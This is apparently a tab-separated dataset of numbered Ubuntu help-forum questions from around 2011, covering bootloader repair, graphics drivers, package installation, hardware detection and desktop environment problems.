54766	ubuntu not booting after removing linux partition	i know it 's stupid now , after i checked the internet , but i just formatted a partition that i had installed grub to . now , whenever i boot , i end up with error 15 ( which means `` file not found '' ) . so , i got my ubuntu 11.04 live disk out and installed it on top of the formatted partitition , and now at least i can boot - but i want to get rid of the duplicate ubuntu now . i think what i need to do is make grub look back on my first partition - which i have established to be /dev/sda1 , or ( hd0,0 ) in grub-talk . but , when trying grub > root ( hd0,0 ) grub > setup ( hd0 ) or trying : grub > root ( hd0,0 ) grub > setup ( hd0,0 ) i end up with : checking if `` /boot/grub/stage1 '' exists ... no checking if `` /grub/stage1 '' exists ... no error 15 : file not found which is not good ! my sudo fdisk -l looks like this ( run from the live installation ) : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ce6db device boot start end blocks id system /dev/sda1 * 1 28210 226594816 83 linux /dev/sda2 29255 30402 9212929 5 extended /dev/sda3 28210 29255 8388608 83 linux /dev/sda5 29255 30402 9212928 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 7948 mb , 7948206080 bytes 245 heads , 62 sectors/track , 1021 cylinders units = cylinders of 15190 * 512 = 7777280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00077236 device boot start end blocks id system /dev/sdb1 * 1 1021 7754464 b w95 fat32 ( note : sdb1 is my livedisk , an 8gb sd card ) ps : the reason i 'm going through all this is because i want to install android-x86 , but the grub it comes with wont recognize ubuntu , so it 's not much of a dual-boot .
54767	how to swap x-server with emacs org-mode ?	i 'm quite impressed of emacs ' org-mode . so i want to use it for note-taking during lectures . to use it `` distraction-free '' my idea is the following : i want to register a bash-command , which swaps the x-server session with tty2 and starts emacs with its org-mode . is it possible to pass my credentials from the x-server session to tty2 ( optional ) ?
54768	can kubuntu simulate the aero desktop peek functionality from windows 7	windows 7 has an aero feature that allows you to make all windows on a workspace transparent to let you look at desktop . i already have a shortcut setup for `` show desktop '' but that does n't do so without minimizing all of the windows running on a given workspace . is there any way to make all windows completely transparent by moving the mouse to one corner of the screen ? the reason why i do n't want to minimize any windows because wine has a slight glitch when running pokerstars - wine will completely freeze if you minimize a running table window w/ pokerstars .
54770	how can i install applications on secondary storage hard drive ?	so , i wish to build a computer soon and i would like to have the one hd for the ubuntu os and another hd for storage , but how would i set this up ( so that when i install applications , etc . they automatically go to the storage hd , that way the os drive wo n't get clogged up as quickly ) ?
54771	potential ufw and fail2ban conflicts	will running both fail2ban and ufw cause problems ? i noticed that fail2ban modifies iptables rules , but ufw already has a ton of iptables rules defined ... so i 'm not sure if fail2ban will mess these up .
54776	application menu for rubymine	i noticed that there are some applications ( e.g. , rubymine ) that are not integrated with the global menu . for libreoffice i 've seen that there already are fixes . how do you make an app like rubymine integrate well with the global menu ? if there is no current solution , what do you have to do to fix this ( and give it back to the community ) ?
54778	is there a way to hide applications from other desktops/workspaces in the unity launcher ?	i do n't want to see applications that are opened on my other desktops ( workspaces ) in my unity launcher ( or sidebar , whatever it is called ) . i find it annoying and would prefer if unity just dealt with one desktop/workspace at a time . is there a way to do this ? i have a feeling the answer will be no , but i 'm asking anyway ... maybe it will be implemented in future versions .
54781	sify broadband dialer client fail to install	a few days ago i tried to migrate directly towards ubuntu 11.04 , but find it difficult , because my internet connection does n't works as it depends on sify dialer login gui program provided on windows . so , i tried all googling about that dialer client for ubuntu , i found this : client developer site : http : //sites.google.com/site/sifydialer/ and its launchpad repository : https : //launchpad.net/connectplus but as i do n't know how to help this developer of connect plus for faster delivery of stable client , i request anyone here , who has done something like that before please help him accomplish that faster , as its opensource client . or provide me another way out from such situation . what i tried already : i tried connect-plus dialer installation , it never starts and i tried sify dialer of windows on ubuntu , using wine , i installed it , but ca n't find where its gone in ubuntu 11.04 , so stuck there . and i ca n't operate in terminal , as i 'm newbie , do n't know any commands .
54783	how to diagnose overheating computer on ubuntu ?	i recently installed ubuntu and now have a dual boot windows and ubuntu machine . the problem is that whenever i run ubuntu , the computer heats up even when i 'm doing the most meager of tasks . for example , when it 's idle it 's usually at 64째c and once i open firefox and only have a couple of tabs open it shoots up to over 80째c . my computer runs much cooler on windows . i suspect some unnecessary use of resources . the question , what 's the best way to diagnose what 's going on ?
54784	is ubuntu branding with other linux distro logos ok ?	so i 'm organizing a ubuntu hour , and advertising it through both the local lug and the loco team - what 's the policy regarding the ubuntu logo on a poster with other linux distros ? ( fedora , debian , arch etc )
54786	usb ports have stopped recognizing my ipod	i have ubuntu 10.04 . recently ubuntu has stopped recognizing my ipod and sd card when i plug them into usb ports . ubuntu now refers to them as `` generic storage devices '' . i ca n't do anything with them . how can i fix this ?
54787	record live streaming	is it possible to record live streaming from websites such as ustream or any other similar website using adobe flash player ? i know that is possible to record the screen but the quality is not that good . any suggestions for any applications ? ps : i found that i can easily record windows media streaming videos or any other similar videos using vlc , easy and fast .
54788	fail to plug samsung galaxy s2 to ubuntu 11.04 using usb ( with or without debug mode )	the scenario was working few days ago . i was able to plug my galaxy s2 to my laptop mount it under linux mint 11.04 ( ubuntu ) , i mean it was fully detected and working . now , the android device detect the usb plugging , but the laptop does n't `` react '' anymore : nothing in lsusb and errors in dmesg | tail log : [ 56946.981778 ] usb 2-1.5 : new full speed usb device using ehci_hcd and address 33 [ 56947.061827 ] usb 2-1.5 : device descriptor read/64 , error -32 [ 56947.251592 ] usb 2-1.5 : device descriptor read/64 , error -32 [ 56947.441519 ] usb 2-1.5 : new full speed usb device using ehci_hcd and address 34 [ 56947.521649 ] usb 2-1.5 : device descriptor read/64 , error -32 [ 56947.711412 ] usb 2-1.5 : device descriptor read/64 , error -32 [ 56947.901294 ] usb 2-1.5 : new full speed usb device using ehci_hcd and address 35 [ 56948.320944 ] usb 2-1.5 : device not accepting address 35 , error -32 [ 56948.401060 ] usb 2-1.5 : new full speed usb device using ehci_hcd and address 36 [ 56948.820710 ] usb 2-1.5 : device not accepting address 36 , error -32 [ 56948.820963 ] hub 2-1:1.0 : unable to enumerate usb device on port 5 p.s . : i add the udev rules without success : /etc/udev/rules.d/70-android.rules with that rule : subsystems== '' usb '' , attrs { idvendor } == '' 04e8 '' , attrs { idproduct } == '' 6640 '' , mode= '' 0666 '' , owner= '' root '' , group= '' myuser '' , symlink+= '' android % n ''
54790	command line disc burning : growisofs fails to write dvd	i 've successfully burned cds from .iso images with wodim , but using this : growisofs -dvd-compat -z /dev/sg1=imagetoburn.iso fails with : executing 'builtin_dd if=imagetoburn.iso of=/dev/sg1 obs=32k seek=0' : - ( write failed : illegal seek brasero seems to work just fine in gui ; am i missing a library ? is the command wrong ?
54794	can not view pdf files with fillable fields with okular	most pdf files work perfectly well with my default document viewer okular , but can not open a pdf file with fillable field with any program other than adobe acrobat reader ( acroread ) . is there anyway to make okular open , edit and save pdf documents with fillable forms ?
54798	how to change wlan0 mac adress ?	my native linux partition is connected with a yagi usb antenna and my virtual machine is a cloned setup of it , the problem is the mac adress that interfere but i could only change the mac adress of the native partition because of the specifics uses of the virtual machine ...
54801	alternatives to adobe products	i 'm looking for alternatives of adode products , such as dreamweaver or flash . i thought to run them on wine , but i 'm sure it would n't work . thanks
54807	can i install ubuntu on a macmini g4 ?	can i install ubuntu on a macmini machine ? it has a g4 processor , not intel , it 's a great machine and unfortunately it is being outdated , is there any hope ?
54808	can not restore grub ( ubuntu 11.04 + win 7 )	i 'm trying to fix grub on my pc , but i 'm running into serious issues doing so . any help would be greatly appreciated as i 'm completely crippled right now . here is the sequence of events for this pc : installed windows 7 split full disk into two partitions ( one for win7 and one for multimedia ) long time passed split one of the partitions into two again installed ubuntu 11.04 on new partition a little time passed windows 7 acting up , reinstall ubuntu grub gone tried restoring grub by mounting and grub-install from live usb tried switching to a live cd instead of usb ( thinking it might be the drive ) now i do n't see grub and i 'm getting `` input/output '' errors an example i/o error : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbe86aff6 device boot start end blocks id system /dev/sda1 * 1 48727 391393280 7 hpfs/ntfs /dev/sda2 48727 77063 227612647+ 7 hpfs/ntfs /dev/sda3 77063 91202 113566721 5 extended /dev/sda5 77063 90622 108908544 83 linux /dev/sda6 90622 91202 4657152 82 linux swap / solaris ubuntu @ ubuntu : ~ $ sudo mount /dev/sda5 /mnt ubuntu @ ubuntu : ~ $ sudo grub-install -- root-directory=/mnt /dev/sda mkdir : can not create directory `/mnt/boot ' : input/output error ubuntu @ ubuntu : ~ $ cd /mnt ubuntu @ ubuntu : /mnt $ ls ls : can not access etc : input/output error
54809	how can i remove packages using preseed ?	i 'm setting up an automated `` no questions asked '' preseed system and using dustin kirkland 's server preseed as an example . he uses the following line to install three packages as part of the automated install : d-i pkgsel/include string byobu vim openssh-server i am looking for the inverse of this , basically be able to remove packages as part of the automated install . i 've checked the installation guide i 've checked this example preseed , but it 's not clear if this is the canonical list of every single option available . i am thinking i need to to use d-i preseed/late_command string apt-remove packagename to clean up stuff i do n't want when the install is done , but i am not sure
54811	docky renders weird when i change theme , add docklets , etc	im using docky in 11.04 . everytime when i customize ( change the theme , add docklets , etc ... ) the dock , it crashes look like in the picture , but when i log out and log in again , it runs smoothly . how can i fix it ?
54814	how can i ctrl-alt-f # to get to a tty in a qemu session ?	i 'm doing an install via testdrive using qemu/kvm and i would like to check the log files during the installation , however i ca n't figure out a way to send ctrl-alt-f1 and other f keys to the virtualized window ( it instead goes to the tty on the host machine ) . ctrl-alt-1 through 4 send me to some kind of qemu consoles ( the installer is on one , then there are qemu consoles and one serial and one parallel , so i think i 'm getting close .
54817	xsensors shows only one temperature	i have been trying to find out the temperatures on my laptop since i feel it has been overheating . the processor seems fine but the hdd is definitely on the fritz . problem is that the applet is only showing one temperature . i do not know how to increase the displays . can anyone help out please ?
54818	is there a way to specify the `` ubuntuone '' folder in windows ?	installed the beta ubuntu one on xp , for some reason the `` ubunuone '' folder was not created , instead my shared folder is the root of c : \ drive . i tried uninstalling and reinstalling but no change . can you specify or change the shared ubuntuone folder ?
54820	screen sleeps during video playback	on ubuntu natty , my screen goes to sleep during video playback , i tried googling for a solution , but none of it worked .
54822	ubuntu theme suddenly changed to default and it 's not coming back !	i logged in to ubuntu as i always do and suddenly the theme changed from what i have chosen to the default one and when i try to bring it back , it 's working , but not the way it 's supposed to : as you can see the window border of the normal sized window is what i want it to be but the fullscreen one is not ( it 's ubuntu 's default ! ) and also it is the same about icons . i hope there is someone who knows what my problem is ! i tried the solutions in this question but it did n't work . indicator applet keeps crashing when i log in
54826	vanilla kernel .deb pakage	i want to install the vanilla kernel of ubuntu 10.10 , through the .deb package , but it is not compiling . what 's wrong ? is there a ppa ? please help !
54829	solutions for couch surfing	using ubuntu to consume media such as watching tv , movies , or listening to music , one occasionally wants to surf the web off the couch or control other applications with the computer screen standing at a further distance , making it hard to read ui buttons etc . basically i would like to have a desktop as if decreasing the screen resolution to a quarter or so , but that would make everything look pixelated , of course . so what are usable solutions to increase accessibility here ? compiz has `` enhanced zoom desktop '' , but it only shows a portion of the screen , and people might not use compiz but e.g . unity-2d instead decrease dpi settings ?
54830	sometimes pop-ups and contextmenus leave an `` echo '' in the user interface	not sure how to explain this but the situtation is as follows . sometimes an application will throw a popup or a contextmenu . then after i close that popup or menu and switch to a different application or workspace there is still an echo , a grey area where the popup or menu was . the only way to get rid of it is either to reproduce the graphical effect and hope it goes away properly this time or to close the owner of said popup or menu ( so if chrome made a popup and it leaves an echo it will only go away after closing all instance of google chrome ) . does anyone have a solution ? i tried googling but it 's hard to google for this sort of thing ( that or my google-fu is lacking ) . i use ubuntu 10.10 and gnome 2.32.0 . edit 29-07 : i included a screenshot . the effect is in the lower right corner .
54832	unity does n't look right when running in parallels	i 'm running ubuntu 11.04 on my 2010 13 ' macbook pro using parallels desktop 6 . i can run ubuntu classic perfectly , no lags and everything just works out of the box . when i try to run standard ubuntu though ( with unity , the new launcher & dash etc . ) , all i see is a solid green rectangle on the bottom-right 1/4th of the screen , and in-place of the top panel i just see a transparent bar . does anyone have an idea on how to fix this ?
54837	need software like 'internet download manager '	is there any software in ubuntu like `` internet download manager '' that downloads audio , video , documents , and software with enhanced speed as it does in windows ? downloadhelper helps us download audio and video in linux , but it is far more basic in comparion to 'idm ' . is there any solution to this ?
54839	installing mysql 5.1	this question is surely a dupe of http : //stackoverflow.com/questions/1632056/how-do-you-install-mysql-5-1-on-ubuntu-8-10 since i ca n't comment on that one ... i am starting a new one . i 'm having the same problem as the previous op and i followed the answer provided by andrew ( the first answer with 2 vote ups ) and added the repo . : deb http : //packages.dotdeb.org lenny all did a sudo apt-get update and then a sudo apt-get install mysql-server-5.1 but still i get the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mysql-server-5.1 from the synaptic package depends : mysql-client-5.1 ( > = 5.1.58-1~dotdeb.0 ) but it is not going to be installed depends : libdbi-perl but it is not installable recommends : libhtml-template-perl but it is not installable e : broken packages i have also located the mysql-server-5.1 from the synaptic package manager and tried to update the package from there but i still get the following error : mysql-server-5.1 : depends : mysql-client-5.1 but it is not going to be installed depends : libdbi-perl but it is not installable recommends : libhtml-template-perl but it is not installable edit : the contents of the sources.list file after adding the dotdeb repo . # deb cdrom : [ ubuntu 11.04 _natty narwhal_ - release i386 ( 20110427.1 ) ] / natty main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ natty main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ natty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ natty universe deb-src http : //us.archive.ubuntu.com/ubuntu/ natty universe deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ natty multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty multiverse deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //us.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse # deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu natty-security main restricted deb-src http : //security.ubuntu.com/ubuntu natty-security main restricted deb http : //security.ubuntu.com/ubuntu natty-security universe deb-src http : //security.ubuntu.com/ubuntu natty-security universe deb http : //security.ubuntu.com/ubuntu natty-security multiverse deb-src http : //security.ubuntu.com/ubuntu natty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu natty partner deb-src http : //archive.canonical.com/ubuntu natty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu natty main deb-src http : //extras.ubuntu.com/ubuntu natty main deb http : //archive.canonical.com/ lucid partner deb-src http : //archive.canonical.com/ lucid partner deb http : //packages.dotdeb.org lenny all deb-src http : //packages.dotdeb.org lenny all i 'm having problems installing alomost every package like the openjdk , skype ... . : (
54843	how can i install arial fonts to my office within wine ?	i installed ms office 2007 using playonlinux , and the arial font is italic , for some reason . any hint on how to install it correctly ? this two approaches i found in the internet have failed : to copy the fonts from my windows `` fonts '' folder to /usr/share/fonts/truetype/ and execute fc-cache . to delete all `` arial '' in the folders : ~/.playonlinux/fonts and ~/.playonlinux/wineprefix/office2007/drive_c/windows/fonts/ -- update : follows the screenshot of my arial :
54847	why use a display manager ?	i 'm currently trying to free as much memory as possibile because i 'm using my laptop for scientific simulations . one of the things i made is disable gdm and using login+startx to start gnome session . apart from eye-candy and comfor , is there any drawback of disabling the display manager ? i mean , what are the reasons for the existence of gdm , kdm , lightdm and so on ?
54850	mouse went toes up	i am using 10.04 . i thought my mouse had died , so i went and bought another one , that did n't work either , so i tried them on another machine ( windows ) and they worked fine , so i assumed my ps2 port died . ( keyboard is also ps2 and it works fine ) . no problem , i bought a ps2 to usb adapter , still not working ... right now , i 'm using a wireless mouse , but i really do n't like it . i want to use my other mice . can someone help me ?
54851	update-alternatives : error : alternative path /lib/plymouth/themes/mib-ubuntu/mib-ubuntu.plymouth does n't exist	when i try to download some software from ubuntu center or from synaptic , i get package operation failed ... how to fix this ? edit : i tried to install this game : this is the details from the installation : installarchives ( ) failed : selecting previously deselected package libbulletml0d2 . ( reading database ... 100 % ( reading database ... 239257 files and directories currently installed . ) unpacking libbulletml0d2 ( from ... /libbulletml0d2_0.0.6-4_i386.deb ) ... selecting previously deselected package tumiki-fighters-data . unpacking tumiki-fighters-data ( from ... /tumiki-fighters-data_0.2.dfsg1-4_all.deb ) ... selecting previously deselected package tumiki-fighters . unpacking tumiki-fighters ( from ... /tumiki-fighters_0.2.dfsg1-4_i386.deb ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for menu ... processing triggers for man-db ... processing triggers for python-support ... setting up plymouth-theme-mib-ubuntu ( 0.5.0-2 ) ... update-alternatives : error : alternative path /lib/plymouth/themes/mib-ubuntu/mib-ubuntu.plymouth does n't exist . dpkg : error processing plymouth-theme-mib-ubuntu ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up libbulletml0d2 ( 0.0.6-4 ) ... setting up tumiki-fighters-data ( 0.2.dfsg1-4 ) ... setting up tumiki-fighters ( 0.2.dfsg1-4 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for menu ... errors were encountered while processing : plymouth-theme-mib-ubuntu setting up plymouth-theme-mib-ubuntu ( 0.5.0-2 ) ... update-alternatives : error : alternative path /lib/plymouth/themes/mib-ubuntu/mib-ubuntu.plymouth does n't exist . dpkg : error processing plymouth-theme-mib-ubuntu ( -- configure ) : subprocess installed post-installation script returned error exit status 2
54855	how to uninstall openoffice ?	i want to completely remove open office from my system . what packages do i need to uninstall to remove it completely ? i am using ubuntu 10.10 .
54856	lubuntu keyboard shortcut does n't give focus to opera	i have lubuntu 11.04 , and the openbox keyboard shortcut settings are in ~/.config/openbox/lubuntu-rc.xml . the shortcut i 'm having trouble with is : < keybind key= '' xf86homepage '' > < action name= '' execute '' > < command > opera < /command > < /action > â < /keybind > the problem is , that when opera is already open this shortcut raises opera and opens a new tab as expected , but the focus stays on the previous window . i 've tried the < focus > yes < /focus > tag , but it did n't help . any ideas how to give it focus ?
54857	can symlinks be used in /etc/cron.d/ ?	i 'm trying to implement a configuration mechanism that allows in a certain project to deploy through svn a cron configuration . i immediately thougt that what i should do is cerate symlinks from /etc/cron.d/ to my project 's cron file ( which in turn is controlled by a vcs ) , but that seems to not be working . i found some old forum messages referring that symlinks were not supported and other saying that they are . which is it ? is there anything else or any other good way to achieve this ?
54866	no close button in gnome 3	well , i have done a new ubuntu 11.04 installation and also added the gnome3-team ppa and installed gnome3 , which is running now . all is perfect , except one very annoying issue : the windows i open , have no close button at all ! this is not the usual issue that new users have when they find that the maximize and minimize buttons are gone - in my case the close button is gone too , the window bar only has the title of the window in it , nothing else . nevertheless i have tried adding those buttons min/max buttons to the : close entry in gconf settings ( using gconf-editor or gnome-tweak-tool ) . there were no changes , i still have no buttons whatsoever . something is obviously wrong , but ca n't figure out what .
54869	clonezilla like app for the desktop ?	what i am looking for is a way to clone hard drives ( mainly windows partitions ) while staying inside of the ubuntu os . i do not want to create a partition on the hard drive to boot off of and i am not wanting to use a boot cd . the only thing i can even think of that is close is the 32bit version of ghost that can run from the desktop in windows . it does n't have to be clonezilla , but that is the only linux cloning software i have used and have almost used it exclusively since i discovered it . if there is no way to use clonezilla from the desktop , then i will accept an alternative program . the main thing is that it clones drives and runs from within ubuntu . thank you for your time in advance
54871	mikogo icon lancher ?	i have convinced a few family members to switch to ubuntu/kubuntu , however they are half a country away ( live in canada ) and i need to be able to guide them through things at some times . so i had them install mikogo so we can share desktops and i can have remote access , all easily using just meeting id 's after starting the application . the only thing is that to launch it you have to go into the downloaded mikogo file and double click there . anyone know how i can get that to appear in unity ?
54875	ubuntuone for windows	im very new to ubuntu but i 've been using it since i purchased a netbook and was given a disc by a friend of mine . i am a researcher so i needed a simple but quick operating system and ubuntu seems to do the trick . on my home pc i use windows and , until i upgraded to windows 7 i had the beta for windows . the pc was wiped during the upgrade and now i can not find the beta ! help me please ! katie
54879	broadcom 43225 wireless on acer laptop is disabled	i have a acer aspire 5820t with a broadcom 43225 wireless card . i previously used ubuntu 10.10 and the wireless worked straight away , but when i updated to 11.04 the wireless stopped working . i have managed to get the wireless hardware to switch on for a couple of seconds before turning off ( when you turn the wireless on using the manual switch the wireless light stays on for a couple of seconds and in the drop down connections menu the information under wireless networks changes from 'device not ready ' to 'disconnected ' but shows no wireless networks despite there being one ) . so far i have tried installing an additional driver , and also disabling the additional driver and installing b43-fwcutter and firmware b43 installer . there may have been other things that i 've found in searches that i 've tried but unfortunately i ca n't remember them . any help would be appreciated .
54880	plymouth and grub do not show at all	i am using ubuntu 11.04 64-bit as my only os on my desktop computer , which used to only run ubuntu 10.04 lts until i had the time to upgrade it with a fresh install . it uses integrated nvidia graphics ( listed as a geforce 6150se nforce 430 by the nvidia x server settings utility ) with the current proprietary driver as provided by the additional drivers utility , and has a vga connection to a 1680x1050 acer monitor . i used to get the ( ugly-looking version of ) plymouth graphical boot screen while under 10.04 . it did n't look that great , but i was fine with it . now , it does n't show on 11.04 at all during boot ( i just get an error message in a moving gray box from the monitor saying `` input not supported '' ) , and only rarely it will show on shutdown , all garbled up . i could not get grub to show during boot while holding down shift , either ( same error message ) , but pressing enter while it should be up starts the system normally . a picture of the error message i was getting : once fully booted , the system still shows the login screen and desktop just fine . any information on how to troubleshoot this would be appreciated . if there 's any hardware-specific stuff i forgot to include here , let me know the relevant commands to run in a comment below . things that i 've tried : running plymouth in a framebuffer : no effect booting with nomodeset as my grub boot : option no effect booting with nomodeset and plymouth in a framebuffer : no effect other than plymouth showing during shutdown only following the softpedia instructions for fixing plymouth 's resolution : problem mostly solved , except logo does not show in plymouth during boot , and both grub and plymouth are slightly off-center # 4 above , but with nomodeset removed as a grub boot option : same effect as # 4 # 5 above , but with vt.handoff=7 added as a grub boot option : same effect as # 4 i have added the current contents of /etc/default/grub as requested in the comments : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash video=uvesafb : mode_option=1280x1024-24 , mtrr=3 , scroll=ywrap '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode=1280x1024 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' current status : i forgot to uncomment one line as per `` things that i 've tried '' # 4 , so i took care of that . i can now see grub during startup when i hold shift and a normal-looking plymouth during shutdown ... but plymouth during boot is now just a solid purple screen . in each case , it 's displayed a little off-center to the left , with a thin black bar running down the right side of the monitor . the error pictured above no longer shows . i 'd say this problem is about 2/3 solved now . update : after natty started freezing up on me , i decided to dual-boot with oneiric , which unfortunately shows the same problems . rather than trying all these workarounds though , i decided to do what i should have done from the start and file a pair of bug reports . last update : bug 850908 has been confirmed as a legitimate nouveaufb bug . i have overwritten my 11.04 partition with 12.04 lts , and i can confirm at this time that the issue is present there , as well . i will now flag this question to be closed , yet i hope it was helpful for anyone who experienced similar issues ; if you are still having the same problem as me , please go there and mark yourself as affected . thanks !
54881	is there any window manager like the windows 7 's for ubuntu ?	in windows 7 , if you drag a window to the top of the screen , it will maximize , and if you drag to the side , it will restore to half size of the screen on that side . is there any window manager or plugin for nautilus with this features ?
54882	install stuck on partitions formatting	i 'm just doing a base install of ubuntu server . the install goes fine until it reaches the partitions formatting section . it just goes to 33 % and stays there . i have read on some sites that its still formatting even though it stays on 33 % and that it will eventually format . but i left it alone for 12 hours and its still the same . the hard drive is 250gb . i do n't think that it should take that long should it ? i have tried cd , dvd and unetbootin including versions 10.04 , 10.10 , 11.04 , but they all do the same thing . i can install the ubuntu desktop version quickly with no problems though .
54885	x wo n't start when using nvidia ion	i 'm trying to get x to start on a system with an nvidia ion chipset , but no matter what i do , it fails . this device worked with nvidia as the driver with ubuntu karmic , so i 'm not sure why it 's failing . ( ii ) loadmodule : `` nvidia '' ( ii ) loading /usr/lib/xorg/extra-modules/nvidia_drv.so ( ii ) module nvidia : vendor= '' nvidia corporation '' compiled for 4.0.2 , module version = 1.0.0 module class : x.org video driver ( ee ) nvidia : failed to load the nvidia kernel module . please check your ( ee ) nvidia : system 's kernel log for additional error messages . ( ii ) unloadmodule : `` nvidia '' ( ii ) unloading /usr/lib/xorg/extra-modules/nvidia_drv.so ( ee ) failed to load module `` nvidia '' ( module-specific error , 0 ) ( ee ) no drivers available . fatal server error : no screens found dmesg has no useful info regarding it . i have these packages installed : # dpkg -l *nvidia* | grep ^ii ii nvidia-173 173.14.22-0ubuntu11 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-173-modaliases 173.14.22-0ubuntu11 modaliases for the nvidia binary x.org driver ii nvidia-180-modaliases 185.18.36-0ubuntu9 transitional package for nvidia-185-modaliases ii nvidia-185-kernel-source 195.36.24-0ubuntu1~10.04 transitional package for nvidia-glx-185-kernel-source ii nvidia-185-libvdpau 195.36.24-0ubuntu1~10.04 transitional package for nvidia-185-libvdpau ii nvidia-185-modaliases 195.36.24-0ubuntu1~10.04 transitional package for nvidia-185-modaliases ii nvidia-96 96.43.17-0ubuntu1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-96-modaliases 96.43.17-0ubuntu1 modaliases for the nvidia binary x.org driver ii nvidia-common 0.2.23 find obsolete nvidia drivers ii nvidia-current 195.36.24-0ubuntu1~10.04 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-current-modaliases 195.36.24-0ubuntu1~10.04 modaliases for the nvidia binary x.org driver ii nvidia-glx-173 173.14.22-0ubuntu11 transitional package for nvidia-glx-173 ii nvidia-glx-180 185.18.36-0ubuntu9 transitional package for nvidia-glx-185 ii nvidia-glx-185 195.36.24-0ubuntu1~10.04 transitional package for nvidia-glx-185 ii nvidia-glx-96 96.43.17-0ubuntu1 transitional package for nvidia-glx-96 ii nvidia-settings 195.36.08-0ubuntu2 tool of configuring the nvidia graphics driver i 'm starting x with xinit /usr/bin/lxsession -session no_wm -- /usr/bin/xorg :0.0 -dpms -s 0 -v -allowmouseopenfail -br ( the session is a custom one , but others fail too . ) here 's my xorg.conf section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' identifier `` card0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` unknown board '' busid `` pci:2:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 24 endsubsection endsection if i use nvidia-xconfig it produces a config file with the vesa driver , which is n't acceptable for what this box will be used for . i 'm at a loss for how to continue . from some googling , i found advice that suggested to add some modprobe blacklists , which i added ; they did not help . blacklist vga16fb blacklist nouveau blacklist rivafb blacklist nvidiafb blacklist rivatv the device , according to lspci is 02:00.0 vga compatible controller : nvidia corporation device 0874 ( rev b1 ) loading the modules directly fails : # modprobe nvidia fatal : module nvidia not found . # modprobe nvidia-current fatal : module nvidia_current not found . dkms status says i have it ; # dkms status nvidia-96 , 96.43.17 : added nvidia-current , 195.36.24 , 2.6.32-32-generic , i686 : installed nvidia-173 , 173.14.22 : added here 's the loaded modules . # lsmod module size used by snd_hda_codec_nvhdmi 3840 1 snd_hda_codec_realtek 203376 1 